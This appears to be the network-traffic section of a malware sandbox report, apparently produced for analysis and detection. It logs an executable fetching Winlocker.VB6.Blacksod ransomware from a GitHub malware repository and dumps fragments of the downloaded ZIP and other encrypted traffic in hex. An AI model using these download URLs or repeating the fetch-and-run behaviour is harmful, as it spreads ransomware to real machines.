                                                                                                                                                            Data Ascii: eCn(C[H"M0 f3;c5M \L(Sy$dqK)SKlu} c W$_a`l"wTKSvS2CpW5gHO/nZEVvB:'v4*gJ|M3yl0hAR|a*/
                                                                                                                                                            2022-09-29 12:44:56 UTC2299INData Raw: 87 60 16 4a fd ee f3 ec 3d e0 14 8f 2b c8 0c 1c 84 cf f4 b7 99 1c 3b 73 08 d2 00 98 d3 bb 89 7a 37 dc d2 46 57 a2 ca 2a b5 6e 15 12 1e d2 a3 18 12 e5 cf 35 26 ea b0 b1 0c ef e2 b7 20 0d 5d 59 c9 86 46 54 8f b8 a3 21 47 83 a5 9f 6c db 5b fc 9d 7f 80 07 e4 74 ef 68 4f 43 2c f6 b5 f1 55 bd fb 62 72 0d df 14 dd e1 40 55 90 fe 9f 28 ff c4 36 c9 e1 19 05 aa 0a ad 45 3c 90 f2 29 04 53 15 e2 7e 94 0d 13 cf 1b a5 fb 4b c4 52 3c 19 ec e5 89 0d f9 18 f4 29 2d 86 fa d3 d6 ad 02 87 0c 21 18 89 ef 77 2e b5 2d 6f 20 96 12 75 6b 66 3e 6a a8 74 d1 d9 73 3d 4f 7d e8 11 6d a4 2c fd ec 7c 8b 7f a3 ea bf 14 df 82 a4 04 29 41 fa fa 7c f8 f1 9c fc 0d e9 26 c7 0c f2 6a 1d 6e d7 2a 8c 10 f7 fc 0c 9e 65 f1 16 a7 9a 8d df 32 29 03 2d bd 60 42 9a f1 dd 60 b7 cf 83 f5 cc f7 df 24 a6
                                                                                                                                                            Data Ascii: `J=+;sz7FW*n5& ]YFT!Gl[thOC,Ubr@U(6E<)S~KR<)-!w.-o ukf>jts=O}m,|)A|&jn*e2)-`B`$
                                                                                                                                                            2022-09-29 12:44:56 UTC2315INData Raw: 81 74 c2 fc e1 42 fd c9 85 48 c3 70 8b 97 f7 df 97 a0 e4 b0 60 73 79 20 d3 fd 37 3c f1 00 4e a3 a0 a0 c1 dc a4 44 43 9a 19 74 fe 9d 23 07 6e 22 63 f0 2b 59 1d 99 9b 0a 3a c2 94 53 41 23 dd dd 06 81 6a fd 6b de ff c2 10 d9 27 c1 d8 55 50 e8 ad 53 90 a7 68 fd bf cd 3a 49 81 06 20 56 57 27 cc 19 44 62 08 a7 46 99 c1 35 56 16 96 b0 9f 1b db 8c 19 20 4e 07 66 17 4e bc 89 58 0c 1f 17 47 fd f1 f9 0e 0d d3 03 25 c1 38 99 89 5a 28 df 89 d0 04 d5 ea 58 d9 1e 55 ff 80 59 0f d8 a1 a4 99 6c 1a 6f 5b 40 31 3e 0f ad d2 d0 3c 82 b6 21 bf 1e 0b c5 a8 a4 be d3 15 7d c7 98 cf e9 80 5e 87 67 bc 16 3e 2f 62 80 f6 9e 41 3b 93 5d db 58 58 ea 7b c1 cd 76 1e 06 f7 32 4a 02 ee e0 29 1c 90 69 31 99 72 df c8 f9 9e 69 86 0a 75 0e 65 b7 d5 d0 b7 a9 1b de 05 be 20 49 15 27 e0 d0 1d a2
                                                                                                                                                            Data Ascii: tBHp`sy 7<NDCt#n"c+Y:SA#jk'UPSh:I VW'DbF5V NfNXG%8Z(XUYlo[@1><!}^g>/bA;]XX{v2J)i1riue I'
                                                                                                                                                            2022-09-29 12:44:56 UTC2331INData Raw: 1e fb 76 98 3d 60 51 e8 b7 63 3e a2 c6 21 e7 08 88 b4 84 54 30 6d 83 f5 3f a3 d1 31 43 a7 53 b0 f1 23 c6 86 6d b9 29 ac 55 3a d4 34 2d 56 63 de 79 ab ee 44 29 83 19 5d a4 13 c9 e4 b9 f8 5c d8 da db c2 84 b6 f7 b5 fc b1 88 b2 dd 28 fb 1d ea 6c 85 22 be d2 f1 c1 63 be b0 06 e1 a7 49 a1 b1 b9 03 c2 09 6a 02 fa db 51 1e 46 4d 2e 8a b1 29 2b 82 f7 89 de 17 2b 91 3e 7e c4 e9 de 92 3e a8 25 d4 6b 75 b9 3a 94 04 47 c1 ed 1b 1c 32 f0 6b 61 88 2b de e6 ac 9a 5a fc 8c a0 17 09 a9 dd cf b0 40 03 5a ba 0c cf 7f 62 4e 01 ed 60 41 b2 c1 e4 c7 d1 17 8a 79 cd ce 0f f7 1f 3b 40 27 e8 e4 c6 4f 5d ee 67 6f bb 89 22 38 0a ce b2 4d cc 23 b8 03 65 3b 76 73 00 98 b2 7e d1 3b ec 99 a5 a8 cb cd 0d c9 79 05 2c 72 72 23 03 ce 81 cf e3 18 81 5c 22 ce 89 4b 75 08 12 d9 ea bb 50 84 a2
                                                                                                                                                            Data Ascii: v=`Qc>!T0m?1CS#m)U:4-VcyD)]\(l"cIjQFM.)++>~>%ku:G2ka+Z@ZbN`Ay;@'O]go"8M#e;vs~;y,rr#\"KuP
                                                                                                                                                            2022-09-29 12:44:56 UTC2347INData Raw: ea cc 73 56 cb ab 35 3a 4e 13 d5 93 0f c8 7a 4a d8 8e 7f 77 4f 77 7b c5 67 15 66 b9 a2 1c ca cd e7 b4 ff 25 a1 35 69 73 13 2f 45 a5 6e e8 a3 48 fe 88 19 61 ca d4 dd dc 62 f8 80 a4 80 80 d5 75 7e 8c f1 88 75 e9 ec 07 0e 15 8c 34 dc ef b7 a2 9c 83 60 38 ee aa cb 96 8c 77 77 d5 a8 4e 8a 1e 4c f3 49 4f de 0e d7 2e c6 07 99 ef 77 f6 20 8c ba 8e b5 28 80 ff 03 53 de b3 8a 47 98 bf 8c df 01 52 34 ec 07 23 66 5e da 81 e1 ea 13 44 ca d9 45 2c 74 ce 4c 61 2d 79 51 67 d7 45 e7 ce f0 4e 70 81 fb af 1d f5 f9 45 4e e3 88 bc 31 08 db ce a6 ea 76 f5 f3 36 e2 af 83 92 31 ff 49 db 30 db 0e 21 38 b8 77 8f 0b 9d 86 ab 87 b6 9c ff f2 bc f3 22 95 32 a4 8e 09 55 79 be bc f6 a4 fb 3b 67 a8 9e 85 76 0e 6d 03 8a 5c ff c0 9e e4 7a 0c 23 22 42 f6 a2 95 e0 dd 4a 84 46 ef 31 eb e0 85
                                                                                                                                                            Data Ascii: sV5:NzJwOw{gf%5is/EnHabu~u4`8wwNLIO.w (SGR4#f^DE,tLa-yQgENpEN1v61I0!8w"2Uy;gvm\z#"BJF1
                                                                                                                                                            2022-09-29 12:44:56 UTC2363INData Raw: 17 08 86 b9 42 95 71 31 15 40 85 43 c7 6b f3 df 62 2d 90 eb 9f 3f cc 07 bc 9f ea 03 eb 45 3e 67 9e ca f6 e4 69 9c de de 0d 51 82 ec cb da e0 11 43 f4 22 f8 c4 49 c7 59 d3 a5 24 14 7a a8 8d 1d b7 67 85 32 7d 6c 8d 9a de 10 70 4c c1 04 d5 cf 19 f3 f7 e8 85 a8 83 bb 8a 3d 14 8c 1a d9 73 f8 d2 e2 c5 a2 0f 4d 68 79 fc af c3 9f e3 c4 5d f3 90 3f b0 d1 34 ad 33 cd a1 1c 31 5c 5c 02 02 c2 fd 26 f3 e9 82 57 0c dd b2 b7 e7 47 a6 74 86 2e b4 99 22 29 25 2f ec 2a 17 01 ae 67 81 40 e8 24 dd 88 c3 8e 20 8c 56 97 f9 39 3e 31 26 b0 e9 19 b5 f5 73 02 b3 ac 04 dd 90 17 e0 63 dc 49 43 0e 57 86 b6 22 38 41 82 01 19 41 df 1a 9a 2f 22 4e 08 d3 92 8b 3e 51 2e 1d e0 b3 fc c3 21 f5 a0 3e 6b 75 49 85 3d b5 67 bf eb 18 56 14 3f 09 db 09 05 6b 0e 92 f1 fb 51 e6 da 75 89 51 80 3f ef
                                                                                                                                                            Data Ascii: Bq1@Ckb-?E>giQC"IY$zg2}lpL=sMhy]?431\\&WGt.")%/*g@$ V9>1&scICW"8AA/"N>Q.!>kuI=gV?kQuQ?


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            42192.168.2.649729140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:56 UTC2366OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/Winlocker.VB6.Blacksod.zip HTTP/1.1
                                                                                                                                                            Host: github.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            43140.82.121.4443192.168.2.649729C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:57 UTC2366INHTTP/1.1 302 Found
                                                                                                                                                            Server: GitHub.com
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:44:57 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                            Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                            Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Winlocker.VB6.Blacksod.zip
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                            Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                            2022-09-29 12:44:57 UTC2367INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            44192.168.2.649730185.199.110.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:57 UTC2369OUTGET /Endermanch/MalwareDatabase/master/ransomwares/Winlocker.VB6.Blacksod.zip HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            45185.199.110.133443192.168.2.649730C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:57 UTC2369INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 1654828
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: application/zip
                                                                                                                                                            ETag: "048f16ec26fac96976b1d3967107c01ab62f85a71c9ea224a0004e0d9a310bb0"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: 080E:67BF:7859E0:85F3A6:63359349
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:44:57 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-mxp6973-MXP
                                                                                                                                                            X-Cache: MISS
                                                                                                                                                            X-Cache-Hits: 0
                                                                                                                                                            X-Timer: S1664455497.165681,VS0,VE179
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            X-Fastly-Request-ID: 64aa73c32d66b1ce1dae8caf9dc24c2630db67c1
                                                                                                                                                            Expires: Thu, 29 Sep 2022 12:49:57 GMT
                                                                                                                                                            Source-Age: 0
                                                                                                                                                            2022-09-29 12:44:57 UTC2370INData Raw: 50 4b 03 04 14 00 01 00 08 00 f3 be f1 48 70 46 04 a5 60 3f 19 00 a8 52 26 00 23 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 57 69 6e 6c 6f 63 6b 65 72 56 42 36 42 6c 61 63 6b 73 6f 64 2e 65 78 65 13 82 84 12 45 39 75 df 15 b3 b4 e2 21 6a 25 fe e2 9e 52 e9 6c c4 4d 37 be 49 97 0a e4 f2 fd eb 82 6d 18 d5 dc f8 b7 12 1f da 01 13 ab a0 f2 8f d0 d0 78 27 00 cb db a6 6f d4 d9 32 0a f0 dc 60 ea bc 46 55 7d 13 2c c3 9a eb 73 98 44 49 93 e0 7c 6a 2c b3 7a 58 78 41 93 99 06 42 b1 7f 75 47 eb a4 a1 79 e6 80 ed 12 91 76 8a 64 fa 6a 78 eb ca c2 0b 70 df 58 a4 d6 63 ef 69 89 6c 2f 21 e9 cc b1 31 b4 cb 54 d9 00 5f de 7a 30 fd 13 6f 15 0f 9f 11 13 bb 23 ca 41 c6 c0 64 41 22 da 3b 27 45 e9 8b 13 90 51 e3 7f 46 e2 bc 4a 84 7f 16 f7 35 b5 58 21 8e 7e 6c 9b dd 9e a3 99 c4 07
                                                                                                                                                            Data Ascii: PKHpF`?R&#Endermanch@WinlockerVB6Blacksod.exeE9u!j%RlM7Imx'o2`FU},sDI|j,zXxABuGyvdjxpXcil/!1T_z0o#AdA";'EQFJ5X!~l
                                                                                                                                                            2022-09-29 12:44:57 UTC2371INData Raw: d2 d6 2d 7a ee 53 b3 b5 5d 3d 63 76 2b 69 a3 5e 09 f0 d7 14 a4 2a b2 51 17 ef 06 91 1b ca 3f 9b 86 16 be 8c 8c da 2d 1d c2 50 a1 a0 c9 57 bf ee a4 dc c0 e0 ed d0 b3 22 85 9e 1f b8 f8 77 5b 1c 7a f2 e5 3c 34 75 58 b9 02 92 76 f5 65 54 9d ed f2 1f 11 f0 4c d8 cc 4a 0c 14 7b 3f b9 f5 14 96 e1 d7 a3 b2 a9 3b 6e 6d 50 17 64 7f 23 38 76 cc de 2e a1 14 ed fa 71 1c a6 7f 6f 32 9f ab a9 1d dd ac 44 02 5d 0e 9a 6f 7a 9f 08 95 74 27 5d 68 0c 14 12 8e eb 3a b8 b7 50 44 47 57 6c cc 80 bd 83 9e c6 fd 9f 21 d2 ae 52 61 05 dd e5 cd 3d 48 b1 59 6c f6 8e c4 3c 8b 36 5e 8c ce da 29 df c3 51 e2 bc 3d 08 7a db eb 28 76 c6 a1 d1 76 f9 f7 ad 3f 78 d1 75 69 28 49 fc 94 c3 72 43 3d fe 25 b8 84 22 85 22 57 a3 a6 6d 6f d7 87 33 83 a1 c8 02 0b 9e 99 e8 79 86 c3 98 5c 00 02 c3 3f eb
                                                                                                                                                            Data Ascii: -zS]=cv+i^*Q?-PW"w[z<4uXveTLJ{?;nmPd#8v.qo2D]ozt']h:PDGWl!Ra=HYl<6^)Q=z(vv?xui(IrC=%""Wmo3y\?
                                                                                                                                                            2022-09-29 12:44:57 UTC2372INData Raw: f5 09 85 b0 c5 00 0b 7a be ed 06 08 70 d2 61 ef aa 31 03 53 80 bf 73 d2 be 55 9a 0a 41 f8 c6 79 f7 80 8f 0d 2b ec df 8b 72 fe 31 08 09 94 05 0f 2e c5 96 3e 61 23 cd 15 fb 9b ef 94 85 35 cd 30 24 39 f5 7c 09 03 d7 eb 3f c7 0c bc 6d 1f 3e 36 fd 56 c7 56 16 2e b3 b6 ed 3b a4 c3 30 86 c1 e2 e8 3b 23 64 5e b0 7f a7 e3 4a ab f3 d3 4e 80 cf 46 12 43 46 2d b8 fd 4b 13 6f d6 17 6a dd 74 bb 2c 9c c7 ff a1 ea df 1a b1 e0 c0 8a b0 a5 e8 fc 93 a4 14 b7 2a cd 19 89 5d c6 15 d5 34 62 73 9f 12 6a db 12 ad 84 89 56 52 b4 45 ed 95 0f c4 ba d9 e0 65 0d a3 59 bf aa 1f 73 09 f1 70 93 f6 a1 ab f3 b8 0f e1 34 19 97 12 5c f2 1e 83 99 a5 08 76 69 43 a8 d9 3c c6 cf 6c e1 d3 6b 99 cf 42 45 8e 6b 4a 1b 35 6d f2 c9 d6 d6 2c 04 ec 68 e0 f4 29 ff d4 c9 c3 26 eb 43 8e 6c d0 38 02 56 0e
                                                                                                                                                            Data Ascii: zpa1SsUAy+r1.>a#50$9|?m>6VV.;0;#d^JNFCF-Kojt,*]4bsjVREeYsp4\viC<lkBEkJ5m,h)&Cl8V
                                                                                                                                                            2022-09-29 12:44:57 UTC2374INData Raw: c2 0b 4c a0 b1 38 4a f2 fb cd 27 40 9a c8 30 e7 1a 7f aa 0e 37 f4 aa f9 56 f3 aa 77 83 c8 99 fd 26 fd 1b fe bd 1d 03 82 ee b3 af 06 65 c0 42 30 b5 a6 89 fa 29 b1 3c 62 76 eb 82 e2 32 a7 e8 5b 27 1f 4b 8a 2f 80 0e d1 e5 f5 ac 80 9c 27 ca 59 f2 09 69 81 85 2f 7d d1 4d 5b da a4 c4 cc df e8 d3 fc ad 9a 1f c3 22 de c4 03 c6 cb dc 17 e4 ab 57 c1 1b 03 93 87 18 c8 91 98 e4 8b 18 6e 6c 16 6c e4 f7 cf 67 39 5e 49 db d8 02 f5 75 24 50 88 8a 07 8f 71 a7 34 28 14 4a 20 b2 5c 64 99 19 0c cb 9b 4e 7a cd ad 69 80 6c 29 92 cf 22 14 34 a1 c2 5a da 34 ba a8 0f f0 5b 24 2f b4 82 62 bf e4 1c 84 4f 44 94 ac a7 76 94 92 78 87 35 6e 25 04 85 c8 f2 af 57 a3 b0 fd 81 47 52 ac ce c5 33 1f 69 61 1d 31 14 63 32 3e f0 5c c3 a0 b9 02 a2 c9 02 35 52 3a 53 5c 56 cb e9 f9 fa 59 de e8 b8
                                                                                                                                                            Data Ascii: L8J'@07Vw&eB0)<bv2['K/'Yi/}M["Wnllg9^Iu$Pq4(J \dNzil)"4Z4[$/bODvx5n%WGR3ia1c2>\5R:S\VY
                                                                                                                                                            2022-09-29 12:44:57 UTC2375INData Raw: d2 05 df c1 45 89 24 04 84 e7 4c 3a 57 9f d9 5b 7e e1 2e 2e b0 98 b1 59 df fc 9c d4 c1 2f 3f c0 ec e6 e8 e9 33 4a a1 87 40 bc 36 bb ed dd cf 16 ec fe a2 54 d6 75 28 c0 c3 5a 3c 69 dc ad a5 2f 3e c3 a2 a3 1b 69 9f 22 1e 07 c2 26 18 95 5e 4b 66 b1 5d 95 a1 6c db b2 7c da dc 78 cd 3c 24 df 95 83 ad ef 7e bb 46 1e 40 5b 26 30 3e 4f fa c6 d6 c7 d0 5a a4 80 9c d1 4f 57 df 18 a3 8d 6e 1a 45 9d fc 52 92 fb f9 55 0b 37 19 c0 26 84 a4 52 82 e5 55 57 ba 75 48 ca 50 56 6f 13 6d f9 f7 b9 04 ac ec 21 41 cb 39 ee 69 4c 1d 95 84 8c 48 08 b5 aa 8b e7 c6 68 01 fa 90 78 33 0e 2f 17 77 4a a1 3d 4d f8 8d 06 dc ee 1e 27 70 54 ab 91 a1 12 77 ad ec 45 f8 26 26 f5 a4 5a c1 1b 48 a0 6b 6c 3a 06 bf 35 e4 33 97 5a f0 05 c4 82 82 03 b3 20 6a ef dd 41 6a d6 31 ee de 9a 3d eb de 7b 24
                                                                                                                                                            Data Ascii: E$L:W[~..Y/?3J@6Tu(Z<i/>i"&^Kf]l|x<$~F@[&0>OZOWnERU7&RUWuHPVom!A9iLHhx3/wJ=M'pTwE&&ZHkl:53Z jAj1={$
                                                                                                                                                            2022-09-29 12:44:57 UTC2376INData Raw: e5 86 18 a7 17 80 14 10 6c 87 e1 d2 0b 1b 7a 1f 13 73 29 cd f8 d8 7f 6d 60 74 d2 f0 41 c2 eb 82 77 5d d0 b9 48 36 cc 23 92 e6 53 74 8c 4b f6 f6 93 5e f9 b4 ca 6e dc 01 dd 0b cc 00 8e 48 19 93 1d 89 b1 9a 5d b7 45 ba b5 7a 84 81 3b a9 06 b2 83 82 4e 15 8e 06 48 30 1b 9d 01 62 19 91 0a a4 6d 91 e8 b7 e8 de bd 94 68 f1 b3 d9 6d 43 b0 a2 3f 9a d4 15 df b8 75 7d 13 c3 2d c5 eb 0d 2f 10 63 3d ef 73 7e 0f 32 3b 3b fd bf b1 b1 76 bd f3 b0 16 22 7f 65 83 e5 49 47 cc fb 18 77 20 32 44 81 75 05 80 64 51 2b c6 80 c4 b3 e5 05 75 da b5 83 ef 18 24 98 24 cd e4 b0 34 78 2b be 8b ef 0c e2 26 e6 18 05 03 2c d3 f9 39 6d 82 4f 16 ed 57 5d be a2 2a fc db 97 9d ad 5b 9d 79 29 81 93 22 ef c5 2a 86 b9 4a 37 9d cb dc b6 58 0d 36 9a bf 86 35 28 7b 56 c9 73 2e 56 cc 5f af aa a5 2f
                                                                                                                                                            Data Ascii: lzs)m`tAw]H6#StK^nH]Ez;NH0bmhmC?u}-/c=s~2;;v"eIGw 2DudQ+u$$4x+&,9mOW]*[y)"*J7X65({Vs.V_/
                                                                                                                                                            2022-09-29 12:44:57 UTC2378INData Raw: 77 cd 30 f1 df f1 13 75 bf 0b 2b 88 28 86 3e 72 eb 75 4b 1a 41 fe d5 a4 18 68 6e e7 66 86 05 36 14 b6 ec 4e b8 d1 f5 cd 8c 94 31 3b 16 74 f3 78 1f 8b cc 07 15 05 e7 82 7b e0 9f 26 e5 44 5c ff aa 46 c7 d7 ce b7 8a 0e 6c e2 57 0d 45 62 d7 62 d6 b1 5d a8 e6 5d ac 66 f0 03 94 3d 69 db c0 a3 48 b6 06 4c e9 3d f7 50 6b 5f a2 fb 7d f5 4d 26 1e cf be a0 7b fa 22 77 10 bd 6d 18 fd df 82 23 36 a1 15 b2 97 56 d6 39 3f b7 ee 21 49 5f b0 4c 2f 83 56 d7 28 3a cc 87 4e bb d9 98 13 1b d8 53 d6 2a b8 28 66 07 f2 8f 09 07 00 e3 fa 8c 34 a8 79 4a ae 2a 64 77 17 e5 13 0c 7e 47 af 86 06 2c 3b 10 5f 55 8e 2d bb 67 ed a6 9b 76 22 bb 93 24 26 ee 28 1a 12 ce 48 f3 1c ea b1 d7 4a d6 5f 04 b0 85 2a be 8a 85 98 40 7f 4c c4 eb 22 06 18 d4 0a 26 0b bc 70 ec 57 c1 18 9f f5 ee ad d0 f3
                                                                                                                                                            Data Ascii: w0u+(>ruKAhnf6N1;tx{&D\FlWEbb]]f=iHL=Pk_}M&{"wm#6V9?!I_L/V(:NS*(f4yJ*dw~G,;_U-gv"$&(HJ_*@L"&pW
                                                                                                                                                            2022-09-29 12:44:57 UTC2379INData Raw: 6c e6 bd 78 f8 7a ff b3 8e 4d 2e 14 92 c8 8a 2e 05 c0 47 73 b7 37 4d c9 17 fe 09 ff 9a 98 9d ab 07 4b 43 65 95 5c d5 7d bc b9 1b 68 9e 9a 28 b4 7d 7b dd 90 1e 12 00 9d 3b f2 e6 da 6d 95 2a 00 6a 99 0c 8e 28 d1 b5 c4 fe f3 ad 90 a7 55 79 5d 0d 8c 6d fe 24 a7 2d 54 48 80 82 6c 31 e5 d4 e9 e7 9a d8 5b 2c c8 a4 e0 b7 16 25 e2 24 98 f7 57 05 25 e3 14 38 db 0c 39 79 d0 a8 6a dc 29 ec 0a be b2 0c 7d a6 bf 33 b1 cb 9d d6 79 8e 47 e1 14 76 0e a7 1d 7f 4b f2 9c 62 09 e3 45 50 ec 00 40 2b 7e a4 87 2d aa 84 be 4a b7 77 4c 59 ec 10 f7 32 d3 2c d6 1a 60 31 01 c1 c3 e1 a5 c1 64 21 f7 61 12 70 ed 6a fd 7a d4 c5 16 ed 8b 08 d8 bc 78 70 7e 09 a2 d6 f0 ab 8b 71 21 60 f1 1d bd c8 61 c2 1b 60 06 80 08 af e5 9c 03 ef 89 c9 98 f7 0f 3e 2f 84 06 c8 55 d7 a5 20 eb c7 13 10 f2 6c
                                                                                                                                                            Data Ascii: lxzM..Gs7MKCe\}h(}{;m*j(Uy]m$-THl1[,%$W%89yj)}3yGvKbEP@+~-JwLY2,`1d!apjzxp~q!`a`>/U l
                                                                                                                                                            2022-09-29 12:44:57 UTC2380INData Raw: 0d cd 76 50 cd 19 b5 30 e5 45 1d 08 78 83 34 5f 20 5d 1b 4f 8d 3b 6d 95 0c 00 0e 74 8f 7f 68 8b 30 1d 6b 66 d6 ab d5 4d 3a 23 a6 4f ad 97 bd 03 dd 88 bc 0f 67 ad 4f e4 48 9d 6b 5a 52 6c 85 04 93 dd 84 e4 b2 8b 7a 12 ad 01 58 f5 e9 92 ac 72 3c 43 a5 d9 87 8d 43 e8 4f 97 bf d0 e9 3e 3c 57 aa 44 42 fe 2f 2e d4 bb fb cf 99 81 0d 98 19 05 86 63 8c 81 ac 97 d4 76 07 9d 3a 6f f6 69 35 d8 49 e9 d9 d4 f8 c2 5f c8 0e 34 27 86 3d 33 84 23 cb 7f cb f6 05 96 3b a5 9e 79 71 c4 db 11 19 92 af e3 c4 25 5e 08 22 db 62 41 4c 69 76 e6 0d 9d c7 c7 36 ce 24 3b 6f 20 6f f4 e2 39 25 2c d3 1b b9 be f1 11 fe 60 32 b1 5f c7 c8 aa 03 ed 0a 37 da 81 4f 30 b3 72 aa b9 ef 94 74 bd 84 22 cd 80 d5 48 04 9e ba d1 f6 50 79 6c 6b e6 ae 2b a2 6a 4b 64 b5 c9 0b e0 8f 24 df 0c 14 76 b3 af df
                                                                                                                                                            Data Ascii: vP0Ex4_ ]O;mth0kfM:#OgOHkZRlzXr<CCO><WDB/.cv:oi5I_4'=3#;yq%^"bALiv6$;o o9%,`2_7O0rt"HPylk+jKd$v
                                                                                                                                                            2022-09-29 12:44:57 UTC2382INData Raw: c3 08 00 82 42 38 28 f6 59 90 d4 df 59 b2 52 fa 80 33 9e 7d 88 9d de 94 a6 d5 a3 27 46 6f b7 19 c7 00 57 2a 9c 83 2c 5c a8 5b 31 7d f6 57 64 a2 52 fb b5 af 50 73 84 66 b6 30 1d 85 9a b7 07 7d c9 16 1d 49 e2 d2 26 a1 33 47 19 12 57 07 56 50 dd 9d 97 de 00 35 03 45 ac aa 53 00 00 3b be 31 6d e7 0c 5e 5d f6 e7 49 b8 3c 14 49 a0 07 9a 8b 77 23 03 86 78 e3 0f e2 ef 57 e4 dd 3a 83 2c 59 90 fd 76 bf be 21 15 8b f0 01 3c 01 c4 d8 fe 2f 15 49 12 48 b6 ea ae df e6 2e 46 0f 43 d6 79 c6 e3 f8 4e 94 d8 63 af 88 5b e2 bb db 50 cb 9f 7f 97 9d 77 42 81 66 33 07 43 b3 52 5e 01 0b a8 b6 06 37 84 12 3b f4 ea 10 bd e1 d2 e6 bd 60 f7 6c 45 b6 8c 8e 19 b2 bc e9 56 b9 d9 d3 ef c3 4e a3 48 8b a6 7c 7b 99 a4 55 31 b5 d5 cf 47 93 d0 b3 7e 22 12 eb 10 39 da 4c 52 ca 1c f1 31 80 27
                                                                                                                                                            Data Ascii: B8(YYR3}'FoW*,\[1}WdRPsf0}I&3GWVP5ES;1m^]I<Iw#xW:,Yv!</IH.FCyNc[PwBf3CR^7;`lEVNH|{U1G~"9LR1'
                                                                                                                                                            2022-09-29 12:44:57 UTC2383INData Raw: dc 92 73 ef 55 67 61 94 18 39 af d6 a4 29 e1 dd 56 e1 c4 8e 71 e0 3d 64 fd ec a2 b4 ff 83 1c ff cb 18 ad fb a8 b6 46 ee 84 83 75 3f ac 77 bf 18 23 ba 5a 9b 59 59 af 0b f0 55 f9 67 80 ce 90 ed f4 08 5b 7f d0 52 42 f0 07 06 80 19 d7 0d 94 0f d0 00 b2 91 0c 09 35 96 2f 75 6e 2f 87 c7 92 ab 19 3e 07 62 7f f4 d2 4e cf 7a 89 ce 69 34 42 ae 38 e3 ff bb 3c f2 a7 a1 3f 96 29 8b 2c 1c 75 45 49 e7 62 4f 25 ac cb e2 84 a3 24 30 b4 8a 3d 62 8c 12 1b 91 6f ad 44 9f 4a 93 b6 46 a1 73 1c 95 0a 46 ff 6d 57 98 37 99 1c 29 69 5b d0 15 a4 65 77 1f a0 23 22 6c 26 0c 2a af 1f bf 0c 3d d8 5e 3c 3a fd 60 82 37 82 ff 96 04 87 5f 38 ea 1d 8d ae f9 eb 9c c7 28 f3 4f 4c 04 98 10 83 88 62 08 56 8f d9 1a a1 26 39 fa 40 ce dd 6e 39 d0 03 03 51 1e c7 eb 08 39 68 ee 0c 1c 38 e2 31 5c 69
                                                                                                                                                            Data Ascii: sUga9)Vq=dFu?w#ZYYUg[RB5/un/>bNzi4B8<?),uEIbO%$0=boDJFsFmW7)i[ew#"l&*=^<:`7_8(OLbV&9@n9Q9h81\i
